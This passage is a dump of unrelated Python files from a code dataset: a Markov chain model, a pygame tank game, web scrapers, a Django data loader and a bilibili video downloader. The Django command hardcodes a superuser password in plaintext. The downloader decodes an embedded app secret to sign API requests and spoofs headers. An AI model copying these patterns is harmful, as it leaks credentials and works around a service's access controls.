torch.PackedSequence [N]\n The sequences for which to compute the negative log-likelihood (number of items N).\n\n Returns\n -------\n torch.Tensor [1]\n The negative log-likelihood.\n \"\"\"\n num_sequences = data.batch_sizes[0].item()\n\n # 1) Get probabilities of first sequence values\n log_likeli = self.initial_probs[data.data[:num_sequences]].log()\n offset = num_sequences\n\n # 2) Iterate over transitions\n for prev_size, size in zip(data.batch_sizes, data.batch_sizes[1:]):\n source = data.data[offset-prev_size: offset-prev_size+size]\n target = data.data[offset: offset+size]\n log_likeli[:size] += self.transition_probs[source, target].log()\n offset += size\n\n # 3) Compute final negative log-likelihood\n return -log_likeli.logsumexp(-1).sum()\n\n def sample(self, num_sequences, sequence_length):\n \"\"\"\n Samples the given number of sequences with the given length from the model's underlying\n probability distribution.\n\n Parameters\n ----------\n num_sequences: int\n The number of sequences to sample.\n sequence_length: int\n The length of the sequences to sample. Generation tends to be much slower for longer\n sequences compared to a higher number of sequences. The reason is that generation of\n sequences needs to be iterative.\n\n Returns\n -------\n torch.Tensor [N, S]\n The state sequences (number of sequences N, sequence length S).\n \"\"\"\n samples = torch.empty(num_sequences, sequence_length, dtype=torch.long)\n\n # 1) Initialize initial states\n samples[:, 0] = self._sample_initial_states(num_sequences)\n\n # 2) Now sample the sequences\n for i in range(1, sequence_length):\n generator = dist.Categorical(self.transition_probs[samples[:, i-1]])\n samples[:, i] = generator.sample()\n\n return samples\n\n def stationary_distribution(self, max_iterations=100):\n \"\"\"\n Computes the stationary distribution of the Markov chain. 
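A stationary distribution pi satisfies pi = pi P. 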
This equals the eigenvector\n corresponding to the largest eigenvalue of the transposed transition matrix.\n\n Parameters\n ----------\n max_iterations: int, default: 100\n The number of iterations to perform for the power iteration.\n\n Returns\n -------\n torch.Tensor [N]\n The probability of a random walker visiting each of the states after infinitely many\n steps.\n \"\"\"\n return power_iteration(self.transition_probs.t(), max_iterations=max_iterations)\n\n def prepare_input(self, data):\n if isinstance(data, PackedSequence):\n return [data]\n if isinstance(data, torch.Tensor):\n return [pack_sequence(data)]\n if isinstance(data, (list, tuple)) and isinstance(data[0], torch.Tensor):\n return [pack_sequence(d) for d in data]\n return data\n\n def _sample_initial_states(self, num_samples):\n generator = dist.Categorical(self.initial_probs)\n return generator.sample((num_samples,))\n\n def __repr__(self):\n return f'{self.__class__.__name__}(num_states={self.num_states})'\n","sub_path":"pycave/bayes/markov/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"362243430","text":"'''\r\nNew Function: My bullet hit enemy tank, using Sprite module\r\nReference: www.pygame.org\r\n'''\r\n\r\nimport pygame, time, nprandom\r\nfrom pygame.sprite import Sprite\r\n\r\nSCREEN_WIDTH = 700\r\nSCREEN_HEIGHT = 500\r\nBGCOLOR = pygame.Color(0,0,0)\r\nFONT_COLOR = pygame.Color(255,0,0)\r\nTANK_SPEED = 3\r\nENEMY_TANK_SPEED = [1,2,3,4,5]\r\nENEMY_TANK_COUNT = 4\r\nENEMY_TANK_STEP = 50\r\nBULLET_SPEED = 6\r\nMAX_BULLET_NUM = 3\r\n\r\nclass BaseSprite(Sprite):\r\n def __init__(self, color, width, height):\r\n # Call the parent class (Sprite) constructor\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\nclass MainGame():\r\n window = None\r\n myTank = None\r\n enemyTanksList = []\r\n myBulletsList = []\r\n enemyBulletsList = []\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def startGame(self):\r\n #init main window\r\n pygame.display.init()\r\n #set width and height\r\n MainGame.window = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])\r\n # set window title\r\n pygame.display.set_caption(\"TankWar\")\r\n # init my tank\r\n MainGame.myTank = MyTank(350, 250)\r\n # init enemy tanks\r\n self.initEnemyTanks()\r\n # init my bullets has been done in KEY_DOWN\r\n # self.initMyBullets()\r\n # show the window\r\n while True:\r\n # set the update time\r\n time.sleep(0.02)\r\n # set bg color\r\n MainGame.window.fill(BGCOLOR)\r\n # draw new surface to window surface\r\n MainGame.window.blit(self.getFontSurface(\"Remain Enemies:{0}\".format(len(MainGame.enemyTanksList))), (10,10))\r\n # display the tank\r\n MainGame.myTank.displayTank()\r\n self.displayEnemyTank()\r\n # display the my bullets\r\n self.displayMyBullets()\r\n # display enemy bullets\r\n self.displayEnemyBullets()\r\n # record the events\r\n self.getEvent()\r\n # control the movement of my tank\r\n if MainGame.myTank.movement:\r\n MainGame.myTank.move()\r\n # update the screen\r\n pygame.display.update()\r\n\r\n def displayEnemyBullets(self):\r\n for enemyBullet in MainGame.enemyBulletsList:\r\n if enemyBullet.alive:\r\n enemyBullet.displayBullet()\r\n enemyBullet.move()\r\n else:\r\n MainGame.enemyBulletsList.remove(enemyBullet)\r\n\r\n def displayMyBullets(self):\r\n for bullet in MainGame.myBulletsList:\r\n if bullet.alive:\r\n bullet.displayBullet()\r\n bullet.move()\r\n bullet.hitEnemyTank()\r\n else:\r\n 
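# bullets whose alive flag was cleared (off-screen or after a hit) are dropped here\r\n                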
MainGame.myBulletsList.remove(bullet)\r\n\r\n def displayEnemyTank(self):\r\n for enemyTank in MainGame.enemyTanksList:\r\n if enemyTank.alive:\r\n enemyTank.displayTank()\r\n enemyTank.randMove()\r\n enemyBullet = enemyTank.shoot()\r\n if enemyBullet:\r\n MainGame.enemyBulletsList.append(enemyBullet)\r\n else:\r\n MainGame.enemyTanksList.remove(enemyTank)\r\n\r\n def initEnemyTanks(self):\r\n top = 100\r\n # loop to create enemy tanks\r\n for i in range(ENEMY_TANK_COUNT):\r\n left = nprandom.randint(0, 600)\r\n speed = nprandom.randint(1, 4)\r\n enemyTank = EnemyTank(top, left, speed)\r\n MainGame.enemyTanksList.append(enemyTank)\r\n\r\n def quitGame(self):\r\n print(\"successful quit!\")\r\n exit()\r\n\r\n def getFontSurface(self,text):\r\n # init the font module\r\n pygame.font.init()\r\n # show the fonts' names\r\n # print(pygame.font.get_fonts())\r\n # get a font object\r\n font = pygame.font.SysFont(\"consolas\", 18)\r\n # draw text on a new surface\r\n textSurface = font.render(text, True, FONT_COLOR)\r\n # return textsurface\r\n return textSurface\r\n\r\n def getEvent(self):\r\n # record the events\r\n eventList = pygame.event.get()\r\n # loop the events and do reaction\r\n for event in eventList:\r\n # if click \"close\" button\r\n if event.type == pygame.QUIT:\r\n self.quitGame()\r\n # if click keyboard\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n MainGame.myTank.direction = 'L'\r\n # MainGame.myTank.move()\r\n MainGame.myTank.movement = True\r\n elif event.key == pygame.K_RIGHT:\r\n MainGame.myTank.direction = 'R'\r\n # MainGame.myTank.move()\r\n MainGame.myTank.movement = True\r\n elif event.key == pygame.K_UP:\r\n MainGame.myTank.direction = 'U'\r\n # MainGame.myTank.move()\r\n MainGame.myTank.movement = True\r\n elif event.key == pygame.K_DOWN:\r\n MainGame.myTank.direction = 'D'\r\n # MainGame.myTank.move()\r\n MainGame.myTank.movement = True\r\n elif event.key == pygame.K_SPACE:\r\n # init a bullet while push K_SPACE\r\n if len(MainGame.myBulletsList) < MAX_BULLET_NUM:\r\n myBullet = Bullet(MainGame.myTank)\r\n MainGame.myBulletsList.append(myBullet)\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT or event.key == pygame.K_UP or event.key == pygame.K_DOWN:\r\n MainGame.myTank.movement = False\r\n\r\nclass Tank():\r\n def __init__(self):\r\n super().__init__()\r\n self.direction = 'U'\r\n self.speed = TANK_SPEED\r\n self.alive = True\r\n self.myTanksImgs = {\r\n 'U': pygame.image.load('img/mytankU.gif'),\r\n 'R': pygame.image.load('img/mytankR.gif'),\r\n 'D': pygame.image.load('img/mytankD.gif'),\r\n 'L': pygame.image.load('img/mytankL.gif')\r\n }\r\n self.enemyTanksImgs = {\r\n 'U': pygame.image.load('img/enemyU.gif'),\r\n 'R': pygame.image.load('img/enemyR.gif'),\r\n 'D': pygame.image.load('img/enemyD.gif'),\r\n 'L': pygame.image.load('img/enemyL.gif')\r\n }\r\n\r\nclass MyTank(Tank):\r\n # init my tank and set the position of the tank\r\n def __init__(self, left, top):\r\n super().__init__()\r\n # get my tank surface according to the direction\r\n self.myTank = self.myTanksImgs.get(self.direction)\r\n # get the rectangle of my tank\r\n self.rect = self.myTank.get_rect()\r\n self.rect.left = left\r\n self.rect.top = top\r\n # set a flag to control the continue movement\r\n self.movement = False\r\n\r\n # display the tank in the game window\r\n def displayTank(self):\r\n # get my tank surface\r\n self.myTank = self.myTanksImgs.get(self.direction)\r\n # display it\r\n 
MainGame.window.blit(self.myTank, self.rect)\r\n\r\n def move(self):\r\n # judging direction\r\n if self.direction == \"L\":\r\n self.rect.left -= self.speed\r\n if self.rect.left <= 0:\r\n self.rect.left = 0\r\n elif self.direction == \"R\":\r\n self.rect.left += self.speed\r\n if self.rect.left + self.rect.height >= SCREEN_WIDTH:\r\n self.rect.left = SCREEN_WIDTH - self.rect.height\r\n elif self.direction == \"U\":\r\n self.rect.top -= self.speed\r\n if self.rect.top <= 0:\r\n self.rect.top = 0\r\n elif self.direction == \"D\":\r\n self.rect.top += self.speed\r\n if self.rect.top + self.rect.height >= SCREEN_HEIGHT:\r\n self.rect.top = SCREEN_HEIGHT - self.rect.height\r\n\r\nclass EnemyTank(Tank):\r\n def __init__(self, top, left, speed):\r\n super().__init__()\r\n self.enemyTank = self.enemyTanksImgs.get(self.direction)\r\n self.direction = self.randDirection()\r\n self.rect = self.enemyTank.get_rect()\r\n self.speed = ENEMY_TANK_SPEED[nprandom.randint(0, 4)]\r\n self.rect.left = left\r\n self.rect.top = top\r\n self.movement = True\r\n self.step = ENEMY_TANK_STEP\r\n\r\n def randMove(self):\r\n if self.step <= 0:\r\n self.direction = self.randDirection()\r\n self.step = ENEMY_TANK_STEP\r\n else:\r\n self.step -= 1\r\n self.move()\r\n\r\n def move(self):\r\n # judging direction\r\n if self.direction == \"L\":\r\n self.rect.left -= self.speed\r\n if self.rect.left <= 0:\r\n self.rect.left = 0\r\n elif self.direction == \"R\":\r\n self.rect.left += self.speed\r\n if self.rect.left + self.rect.height >= SCREEN_WIDTH:\r\n self.rect.left = SCREEN_WIDTH - self.rect.height\r\n elif self.direction == \"U\":\r\n self.rect.top -= self.speed\r\n if self.rect.top <= 0:\r\n self.rect.top = 0\r\n elif self.direction == \"D\":\r\n self.rect.top += self.speed\r\n if self.rect.top + self.rect.height >= SCREEN_HEIGHT:\r\n self.rect.top = SCREEN_HEIGHT - self.rect.height\r\n\r\n def randDirection(self):\r\n num = nprandom.randint(1, 4)\r\n if num == 1:\r\n return 'U'\r\n elif num == 2:\r\n return 'D'\r\n elif num == 3:\r\n return 'L'\r\n elif num == 4:\r\n return 'R'\r\n\r\n def displayTank(self):\r\n # get my tank surface\r\n self.enemyTank = self.enemyTanksImgs.get(self.direction)\r\n # display it\r\n MainGame.window.blit(self.enemyTank, self.rect)\r\n\r\n def shoot(self):\r\n if nprandom.randint(1, 200) < 10:\r\n return Bullet(self)\r\n\r\nclass Bullet(Sprite):\r\n def __init__(self, tank):\r\n self.myBulletImg = pygame.image.load('img/bullet.gif')\r\n self.rect = self.myBulletImg.get_rect()\r\n self.direction = tank.direction\r\n self.speed = 6\r\n self.alive = True\r\n if self.direction == 'U':\r\n self.rect.left = tank.rect.left + tank.rect.width / 2 - self.rect.width / 2\r\n self.rect.top = tank.rect.top - self.rect.height\r\n elif self.direction == 'D':\r\n self.rect.left = tank.rect.left + tank.rect.width / 2 - self.rect.width / 2\r\n self.rect.top = tank.rect.top + tank.rect.height\r\n elif self.direction == 'L':\r\n self.rect.left = tank.rect.left - self.rect.width / 2 - self.rect.width / 2\r\n self.rect.top = tank.rect.top + tank.rect.width / 2 - self.rect.width / 2\r\n elif self.direction == 'R':\r\n self.rect.left = tank.rect.left + tank.rect.width\r\n self.rect.top = tank.rect.top + tank.rect.width / 2 - self.rect.width / 2\r\n\r\n def displayBullet(self):\r\n MainGame.window.blit(self.myBulletImg, self.rect)\r\n\r\n def move(self):\r\n if self.direction == 'U':\r\n if self.rect.top > 0:\r\n self.rect.top -= self.speed\r\n else:\r\n self.alive = False\r\n elif self.direction == 'R':\r\n if 
self.rect.left + self.rect.width < SCREEN_WIDTH:\r\n self.rect.left += self.speed\r\n else:\r\n self.alive = False\r\n elif self.direction == 'D':\r\n if self.rect.top + self.rect.height < SCREEN_HEIGHT:\r\n self.rect.top += self.speed\r\n else:\r\n self.alive = False\r\n elif self.direction == 'L':\r\n if self.rect.left > 0:\r\n self.rect.left -= self.speed\r\n else:\r\n self.alive = False\r\n\r\n def hitEnemyTank(self):\r\n for enemyTank in MainGame.enemyTanksList:\r\n if pygame.sprite.collide_rect(self, enemyTank):\r\n self.alive = False\r\n enemyTank.alive = False\r\n\r\n\r\nclass Explode():\r\n pass\r\n\r\nclass Wall():\r\n pass\r\n\r\nclass Music():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n MainGame().startGame()\r\n # MainGame().getFontSurface()","sub_path":"TankWar2.2.py","file_name":"TankWar2.2.py","file_ext":"py","file_size_in_byte":12149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"590164554","text":"#!/usr/bin/env python3\n\"\"\"ant_colony_tests.py: Solution quality test driver for ant colony TSP algorithm\"\"\"\n__author__ = \"Jessica Lynch\"\n\nimport tsp\nfrom time import perf_counter_ns\n\n\ndef main():\n # Assign timer function to variable\n clock = perf_counter_ns\n\n # Determine max run time for each algorithm\n MAX_MATRIX_SIZE = 50\n MAX_COST = 100\n NUM_TRIALS_PER_N = 50\n\n # Init table variables\n params = [\"Ants\", \"Max steps\", \"Phero\", \"Decay\", \"% Exact\", \"Min cost\", \"Avg. cost\"]\n cols_per_func = 7 # Update if additional data columns are added\n col_width_full = 13 * cols_per_func\n col_width_med = col_width_full // cols_per_func\n col_width_small = 10\n\n # Print function name and test info\n print(f\"{'':>{col_width_small}}\", end=\"\")\n print(f\"{'Ant Colony':>{col_width_full}}\", end=\"\")\n print(\"Trials per N x N matrix:\", NUM_TRIALS_PER_N)\n print(\"Graph type: circular Euclidean\")\n print(\"Graph radius:\", MAX_COST)\n\n # Print data columns (header second row)\n print(f\"{'N':>{col_width_small}}\", end=\"\")\n for param in params:\n print(f\"{param:>{col_width_med}}\", end=\"\")\n print(\"\\n\")\n\n # Test algorithm with N x N matrices\n # for N in range(2, MAX_MATRIX_SIZE + 1):\n N = 9\n while True:\n # Print current N value\n print(f\"{N:>{col_width_small}}\", end=\"\")\n\n # Generate N x N matrix\n matrix, min_path, min_cost = tsp.generate_circular_cost_matrix(N, MAX_COST)\n\n phero_factor = 1\n decay_factor = 1\n ants = 100\n steps = 20\n\n correct = 0\n total_cost = 0\n for _ in range(NUM_TRIALS_PER_N):\n path, cost = tsp.tsp_ant_colony(matrix, ants, phero_factor, decay_factor, steps)\n total_cost += cost\n if path == min_path or path == list(reversed(min_path)):\n correct += 1\n percent_correct = (correct / NUM_TRIALS_PER_N) * 100\n average_cost = total_cost / NUM_TRIALS_PER_N\n\n print(f\"{ants:>{col_width_med}}\", end=\"\")\n print(f\"{steps:>{col_width_med}}\", end=\"\")\n print(f\"{phero_factor:>{col_width_med}}\", end=\"\")\n print(f\"{decay_factor:>{col_width_med}}\", end=\"\")\n print(f\"{round(percent_correct, 1):>{col_width_med}}\", end=\"\")\n print(f\"{round(min_cost, 2):>{col_width_med}}\", end=\"\")\n print(f\"{round(average_cost, 2):>{col_width_med}}\", end=\"\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ant_colony_tests.py","file_name":"ant_colony_tests.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"414587777","text":"import 
bs4, requests\n\nURL = r'https://infostart.ru/job/vacancy/'\n\nres = requests.get(URL)\nres.raise_for_status()\n# pass an explicit parser so bs4 does not have to guess one\nmySoup = bs4.BeautifulSoup(res.text, 'html.parser')\n\n\nelems = mySoup.select('.vacancy-item')\n\nif len(elems) > 0:\n    rabbit = elems[0]\n    rabbit.get('class') # attrs of the found div\n    rabbit.attrs\n    rabbit.select('a') # find elems 
in rabbit\n rabbit.select('p')\n rabbit.select('p')[0]\n","sub_path":"6 web scraping/bs4_test.py","file_name":"bs4_test.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"292962542","text":"from typing import Any, Optional\n\nfrom django.core.management.base import BaseCommand, CommandError\nimport csv\nfrom django.contrib.auth import get_user_model\nfrom reprohack_hub.models import Event, Paper, Review\nfrom datetime import datetime, timedelta\n\nclass Command(BaseCommand):\n help = \"Load initial data\"\n\n def handle(self, *args, **options):\n print(\"Creating initial db data\")\n admin_user = get_user_model().objects.create(username=\"rhadmin\",\n email=\"reprohack-hub@sheffield.ac.uk\",\n is_superuser=True,\n is_staff=True)\n admin_user.set_password(\"T47BfFovEAvTsJiKp3A\")\n admin_user.save()\n\n self.load_initial_data()\n\n\n def get_csv_dict(self, path):\n out_list = []\n with open(path) as events_file:\n reader = csv.DictReader(events_file)\n for row in reader:\n out_list.append(row)\n\n\n return out_list\n\n def load_initial_data(self):\n events_path = \"data/events.csv\"\n papers_path = \"data/papers.csv\"\n reviews_path = \"data/reviews.csv\"\n\n admin = get_user_model().objects.get(username=\"rhadmin\")\n\n events = self.get_csv_dict(events_path)\n for row in events:\n event = Event.objects.create()\n event.creator = admin\n event.host = \"\"\n event.title = row[\"title\"]\n event.is_initial_upload = True\n event.start_time = datetime.strptime(row[\"date\"] + \" \" + row[\"start_time\"], \"%Y-%m-%d %H:%M\")\n event.end_time = datetime.strptime(row[\"date\"] + \" \" + row[\"end_time\"], \"%Y-%m-%d %H:%M\")\n event.city = row[\"city\"]\n event.country = row[\"country\"]\n event.address1 = row[\"address\"]\n event.registration_url = row[\"url\"]\n event.event_coordinates = \",\".join([row[\"lat\"], row[\"lon\"]])\n event.save()\n\n\n\n papers = self.get_csv_dict(papers_path)\n for row in papers:\n print(row)\n\n reviews = self.get_csv_dict(reviews_path)\n for row in reviews:\n print(row)\n","sub_path":"reprohack_hub/management/commands/load_initial.py","file_name":"load_initial.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"433942654","text":"import FWCore.ParameterSet.Config as cms\n\nhltJetSortedVBFFilterRecoPFJet = cms.EDFilter('HLTPFJetSortedVBFFilter',\n saveTags = cms.bool(True),\n inputJets = cms.InputTag('hltJetCollection'),\n inputJetTags = cms.InputTag(''),\n Mqq = cms.double(200),\n Detaqq = cms.double(2.5),\n Detabb = cms.double(10),\n Dphibb = cms.double(10),\n Ptsumqq = cms.double(0),\n Ptsumbb = cms.double(0),\n Etaq1Etaq2 = cms.double(40),\n value = cms.string('second'),\n triggerType = cms.int32(85),\n njets = cms.int32(4),\n mightGet = cms.optional.untracked.vstring\n)\n","sub_path":"HLTrigger/JetMET/hltJetSortedVBFFilterRecoPFJet_cfi.py","file_name":"hltJetSortedVBFFilterRecoPFJet_cfi.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"350679501","text":"from splinter import Browser\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport time\n\ndef scrape(): \n #executable_path = {'executable_path': 'chromedriver.exe'}\n #browser = Browser('chrome', **executable_path)\n browser = Browser('chrome', headless=True)\n\n news_url = 
'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'\n browser.visit(news_url)\n time.sleep(1)\n news_html = browser.html\n soup = BeautifulSoup(news_html, 'html.parser')\n\n #code to loop through all latest articles on first page\n\n #articles = soup.find_all('li', class_='slide')\n\n #for article in articles:\n # text = article.find('div', class_='list_text')\n # news_title = text.find('div', class_='content_title').text\n # news_p = text.find('div', class_='article_teaser_body').text\n\n news_title = soup.find('div', class_='content_title').text\n news_p = soup.find('div', class_='article_teaser_body').text\n\n print(news_title)\n print(news_p)\n\n img_url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n browser.visit(img_url)\n img_html = browser.html\n soup = BeautifulSoup(img_html, 'html.parser')\n\n featured_image = soup.find('a', class_ = 'button fancybox')['data-fancybox-href']\n featured_image_url = 'https://www.jpl.nasa.gov' + featured_image\n print(featured_image_url)\n\n weather_url = 'https://twitter.com/marswxreport?lang=en'\n browser.visit(weather_url)\n weather_html = browser.html\n soup = BeautifulSoup(weather_html, 'html.parser')\n\n mars_weather = soup.find('p', class_ =\"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\").text\n print(mars_weather)\n\n table_url = 'https://space-facts.com/mars/'\n\n table = pd.read_html(table_url)[0]\n table.columns = [\"Description\", \"Value\"]\n table = table.set_index(\"Description\", drop= True, inplace=False)\n table_html = table.to_html()\n print(table_html)\n\n hemi_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(hemi_url)\n hemi_html = browser.html\n soup = BeautifulSoup(hemi_html, 'html.parser')\n\n links = soup.find_all('div', class_='item')\n\n hemi_base = \"https://astrogeology.usgs.gov\"\n hemi_urls = [str(hemi_base + link.a['href']) for link in links]\n\n hemisphere_image_urls = []\n\n for hemi_url in hemi_urls:\n browser.visit(hemi_url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n img_url = soup.find('div', class_= 'downloads').a['href']\n title = soup.find('h2', class_= \"title\").text.rsplit(' ', 1)[0]\n entry = {\"title\" : title , \"img_url\" : img_url}\n hemisphere_image_urls.append(dict(entry))\n\n print(hemisphere_image_urls)\n\n mars_data = {\n 'newsTitle' : news_title,\n 'newsParagraph' : news_p,\n 'featuredImage' : featured_image_url,\n 'marsWeather' : mars_weather,\n 'tableHtml' : table_html,\n 'hemisphereImages' : hemisphere_image_urls\n }\n\n return mars_data\n\n","sub_path":"Mission to Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"124141726","text":"\"\"\"\nWrite a function that reverses the digits a 32-bit signed integer, x.\nAssume that the environment can only store integers within the 32-bit signed integer range,\n[-2^31, 2^31 - 1]. 
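Note that the reversal itself can overflow: reversing 1534236469 gives 9646324351, which exceeds 2^31 - 1 = 2147483647. 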
The function returns 0 when the reversed integer overflows.\n\nExample:\nInput: 123\nOutput: 321\n\"\"\"\n\n\nclass Solution:\n\n    def reverse(self, x):\n        neg = False\n        if x < 0:\n            x = -x\n            neg = True\n        if x >= 2**31:\n            return 0\n        else:\n            _list = list(str(x))\n            _list_reverse = _list[::-1]\n            res = int(''.join(_list_reverse))\n            res = -res if neg else res\n            # the reversed value can itself fall outside the 32-bit range\n            if res < -2**31 or res > 2**31 - 1:\n                return 0\n            return res\n\n\nprint(Solution().reverse(123))\n# 321\nprint(Solution().reverse(2**31))\n# 0\n","sub_path":"October/29Oct2019_Reverse_Integer.py","file_name":"29Oct2019_Reverse_Integer.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"144440115","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 23 17:06:37 2019\n\n@author: wenyz\n\"\"\"\nimport requests,re,hashlib,urllib.request,json\nimport os, sys\nimport socket\nsocket.setdefaulttimeout(30)\nimport threading,time\nfrom multiprocessing import Process,cpu_count\nfrom queue import Queue\nfrom concurrent.futures import ProcessPoolExecutor\n\nimport configparser\n\nimport ffmpy3\n\n_DOWNLOAD_THERAD_NUM = 5\n_CONVERT_PROCESS_NUM = cpu_count()-1\n_DOWNLOAD_HOME = \"G:\\\\downloadtest\"\n_DIRECTORY_CREATE_LOCK = threading.Lock()\n_CONVERT_PROCESS_EXECUTOR = ProcessPoolExecutor(_CONVERT_PROCESS_NUM)\n\nconfig = configparser.ConfigParser()\n\nclass AV:\n    \n    base_url = 'https://api.bilibili.com/x/web-interface/view?aid='\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'\n    }\n    \n    def __init__(self,avid,quality):\n        self.avid = str(avid)\n        self.quality = quality\n        self.pages = []\n        self._init_data()\n    \n    def _init_data(self):\n        html = requests.get(self.base_url + self.avid,headers=self.headers).json()\n        data = html['data']\n        self.title = data[\"title\"].replace(\" \",\"_\")\n        cid_list = data['pages']\n        clip_list = []\n        for info in cid_list:\n            self.pages.append(Page(str(info['cid']),info['page'],info['part'],self))\n        \n        for page in self.pages:\n            clip_list = get_play_list(self.base_url +self.avid + '?p='+ str(page.num),page.cid,80)\n            \n            clips = []\n            index = 0\n            for clip in clip_list:\n                index += 1\n                clips.append(Clip(index,clip,page))\n            page.clips = clips\n\n\nclass DownloadRawVideo(threading.Thread):\n    def __init__(self,clips_queue):\n        threading.Thread.__init__(self)\n        self.clips_queue = clips_queue\n        self.isDaemon = True\n    \n    def run(self):\n        while True:\n            if not self.clips_queue.empty():\n                clip = self.clips_queue.get()\n                self.down_raw_data(clip)\n                self.clips_queue.task_done()\n\n    \n    def down_raw_data(self,clip):\n        opener = urllib.request.build_opener()\n        opener.addheaders = [\n            ('Host', 'upos-hz-mirrorks3.acgvideo.com'), # these headers are necessary, otherwise access is easily refused\n            ('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'),\n            ('Accept', '*/*'),\n            ('Accept-Language', 'en-US,en;q=0.5'),\n            ('Accept-Encoding', 'gzip, deflate, br'),\n            ('Range', 'bytes=0-'),\n            ('Referer', AV.base_url),\n            ('Origin', 'https://www.bilibili.com'),\n            ('Connection', 'keep-alive'),\n        ]\n        urllib.request.install_opener(opener)\n        \n        currentVideoPath = os.path.join(_DOWNLOAD_HOME, clip.page.av.title,clip.page.title)\n        if not os.path.exists(currentVideoPath):\n            # prevent errors from multiple threads creating the same directory\n            if _DIRECTORY_CREATE_LOCK.acquire():\n                #double check lock\n                if not os.path.exists(currentVideoPath):\n                    os.makedirs(currentVideoPath)\n                _DIRECTORY_CREATE_LOCK.release()\n        \n        download_file_name = os.path.join(currentVideoPath, 
r'{}-{}.flv'.format(clip.page.title, clip.num))\n if os.path.exists(download_file_name):\n print(\"{}已经下载完毕!\",download_file_name) \n return\n \n download_video(raw_url=clip.url, raw_file_name=download_file_name,raw_cmd=None)\n \ndef convert_video(page):\n print('convert_video executed')\n currentVideoPath = os.path.join(_DOWNLOAD_HOME, page.av.title,page.title)\n \n L = []\n root_dir = currentVideoPath\n \n for file in sorted(os.listdir(root_dir),key=lambda x:int(x[x.rindex(\"-\") + 1:x.rindex(\".\")])):\n if os.path.splitext(file)[1] == '.flv':\n L.append(\"file '{}'\".format(os.path.join(root_dir,file)))\n \n tmp_file_path = os.path.join(root_dir,'tmp.txt')\n tmp_file = open(tmp_file_path,'w')\n \n for strs in L:\n tmp_file.write(strs+'\\n')\n tmp_file.close()\n \n output = os.path.join(os.path.join(_DOWNLOAD_HOME, page.av.title),page.title + '.flv')\n \n ff = ffmpy3.FFmpeg(\n inputs={tmp_file_path:'-f concat -safe 0'},\n outputs = {output:'-c copy -y'},\n )\n \n ff.run()\n if os.path.exists(tmp_file_path):\n os.remove(tmp_file_path)\n print(\"complete\")\n \n# 访问API地址\ndef get_play_list(start_url, cid, quality):\n entropy = 'rbMCKn@KuamXWlPMoJGsKcbiJKUfkPF_8dABscJntvqhRSETg'\n appkey, sec = ''.join([chr(ord(i) + 2) for i in entropy[::-1]]).split(':')\n params = 'appkey=%s&cid=%s&otype=json&qn=%s&quality=%s&type=' % (appkey, cid, quality, quality)\n chksum = hashlib.md5(bytes(params + sec, 'utf8')).hexdigest()\n url_api = 'https://interface.bilibili.com/v2/playurl?%s&sign=%s' % (params, chksum)\n headers = {\n 'Referer': AV.base_url, # 注意加上referer\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'\n }\n\n html = requests.get(url_api, headers=headers).json()\n\n video_list = []\n for i in html['durl']:\n video_list.append(i['url'])\n return video_list\n\n\ndef download_video(raw_url,raw_file_name,raw_cmd):\n sleep_time = [2,4,30,60,300,3600,20000]\n sleep_index = -1\n while True:\n sleep_index = (sleep_index+1)%7\n try:\n urllib.request.urlretrieve(url=raw_url, filename=raw_file_name,reporthook=raw_cmd)\n break\n except socket.timeout:\n print(\"socket timeout occured!\")\n time.sleep(sleep_time[sleep_index])\n except urllib.error.URLError as e:\n print(\"urllib.error.URLError : \",e.reason)\n time.sleep(sleep_time[sleep_index])\n except Exception as e:\n print(\"unhandled Exception : \",e.reason)\n time.sleep(sleep_time[sleep_index])\n\nclass Page:\n def __init__(self,cid,num,title,av,url=None):\n self.av = av\n self.cid = cid\n self.url = url\n self.num = num\n self.title = title\n self.clips = []\n \nclass Clip:\n def __init__(self,num,url,page):\n self.num = num\n self.url = url\n self.page = page\n\ndef deal_av(avid,quality):\n current = AV(avid,quality)\n download_queue = Queue(maxsize=0)\n for page in current.pages:\n for clip in page.clips:\n download_queue.put(clip)\n \n threads = []\n for i in range(_DOWNLOAD_THERAD_NUM):\n thread = 